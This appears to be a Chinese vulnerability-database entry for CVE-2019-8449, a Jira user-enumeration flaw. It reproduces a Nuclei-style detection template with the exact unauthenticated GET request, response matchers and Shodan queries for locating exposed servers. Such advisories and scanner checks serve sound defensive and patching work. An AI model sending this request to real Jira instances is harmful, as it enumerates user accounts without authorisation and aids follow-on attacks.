CVE-2019-8449: Jira <8.4.0 - Information Disclosure

日期: 2025-08-01 | 影响软件: Jira | POC: 已公开

漏洞描述

Jira before 8.4.0 is susceptible to information disclosure. The /rest/api/latest/groupuserpicker resource can allow an attacker to enumerate usernames, and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations.

PoC代码[已公开]

id: CVE-2019-8449

info:
  name: Jira <8.4.0 - Information Disclosure
  author: harshbothra_
  severity: medium
  description: Jira before 8.4.0 is susceptible to information disclosure. The /rest/api/latest/groupuserpicker resource can allow an attacker to enumerate usernames, and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    An attacker can exploit this vulnerability to gain access to sensitive information.
  remediation: |
    Upgrade Jira to version 8.4.0 or later to fix the information disclosure vulnerability.
  reference:
    - https://www.doyler.net/security-not-included/more-jira-enumeration
    - https://jira.atlassian.com/browse/JRASERVER-69796
    - http://packetstormsecurity.com/files/156172/Jira-8.3.4-Information-Disclosure.html
    - https://github.com/SexyBeast233/SecBooks
    - https://github.com/StarCrossPortal/scalpel
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2019-8449
    cwe-id: CWE-306
    epss-score: 0.68722
    epss-percentile: 0.9858
    cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: atlassian
    product: jira
    shodan-query:
      - http.component:"Atlassian Jira"
      - http.component:"atlassian jira"
      - http.component:"atlassian confluence"
      - cpe:"cpe:2.3:a:atlassian:jira"
  tags: cve,cve2019,atlassian,jira,disclosure,packetstorm

http:
  - method: GET
    path:
      - '{{BaseURL}}/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"users":{"users":'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100808c656676f43a0d4a1c3a5a1b76090da73a4c33cc64a121bbdaba294e58ce95022100b08e37a1266bf6e631424a93131f76073e5505f7649de9447eb35f3d464e7780:922c64590222798bb761d5b6d8e72950

相关漏洞推荐